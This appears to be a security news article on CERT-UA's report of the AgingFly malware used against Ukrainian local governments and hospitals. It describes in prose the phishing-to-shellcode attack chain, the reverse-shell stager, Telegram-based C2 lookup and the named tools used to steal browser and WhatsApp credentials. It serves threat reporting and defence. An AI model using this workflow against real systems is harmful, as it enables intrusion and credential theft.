Ukrainian Computer Emergency Response Team (**CERT-UA**) has identified a new malware family, 'AgingFly,' actively used in attacks against local governments and hospitals in Ukraine. The malware's primary objective is to steal authentication data from Chromium-based browsers and WhatsApp messenger. These attacks, spotted last month, are believed to potentially target representatives of the Defense Forces, according to forensic evidence. CERT-UA attributes these attacks to a cyber threat cluster tracked as UAC-0247. ### Attack Chain The attack chain begins with a phishing email disguised as a humanitarian aid offer. Victims are lured into clicking an embedded link. This link redirects to either a legitimate site compromised via a cross-site scripting (XSS) vulnerability or a fake site generated using an AI tool. The target then receives an archive containing a shortcut file (LNK) that launches a built-in HTA handler. This handler connects to a remote resource to retrieve and execute an HTA file. The HTA file displays a decoy form to distract the user while a scheduled task is created. This task downloads and runs an EXE payload that injects shellcode into a legitimate process. Next, the attackers deploy a two-stage loader, with the second stage utilizing a custom executable format. The final payload is compressed and encrypted. "A typical TCP reverse shell or an analogue classified as RAVENSHELL can be used as stagers, which provides for establishing a TCP connection with the management server," CERT-UA stated in their report. A TCP connection, encrypted using the XOR cipher, is established with the Command and Control (C2) server, allowing for command execution via the Windows Command Prompt. Subsequently, the AgingFly malware is delivered and deployed. A **PowerShell** script (SILENTLOOP) is used to execute commands, update configurations, and retrieve the C2 server address from a **Telegram** channel or fallback mechanisms.  After investigating multiple incidents, researchers found that the attackers are stealing browser data using **ChromElevator**, an open-source security tool. ChromElevator decrypts and extracts sensitive information, such as cookies and saved passwords, from Chromium-based browsers (e.g., **Google Chrome**, **Microsoft Edge**, **Brave**) without requiring administrator privileges. The threat actor also attempts to extract sensitive data from the WhatsApp application for Windows by decrypting databases using the ZAPiDESK open-source forensic tool. Researchers have observed reconnaissance activities and lateral movement within the network, utilizing publicly available utilities like the RustScan port scanner and the Ligolo-ng and Chisel tunneling tools. ### AgingFly's Unique Characteristics AgingFly, written in **C#**, grants operators remote control, command execution, file exfiltration, screenshot capture, keylogging, and arbitrary code execution capabilities. It communicates with its C2 server via WebSockets and encrypts the traffic using AES-CBC with a static key. Notably, AgingFly does not include pre-built command handlers. Instead, it compiles them on the host from source code received from the C2 server. “A distinguishing feature of AGINGFLY compared to similar malware is the absence of built-in command handlers in its code. Instead, they are retrieved from the C2 server as source code and dynamically compiled at runtime,” CERT-UA explains. This approach offers a smaller initial payload, on-demand capability changes, and potential evasion of static detection. However, it increases complexity, relies on C2 connectivity, and expands the runtime footprint, potentially increasing detection risk. CERT-UA advises users to block the execution of LNK, HTA, and JS files to disrupt the attack chain used in this campaign.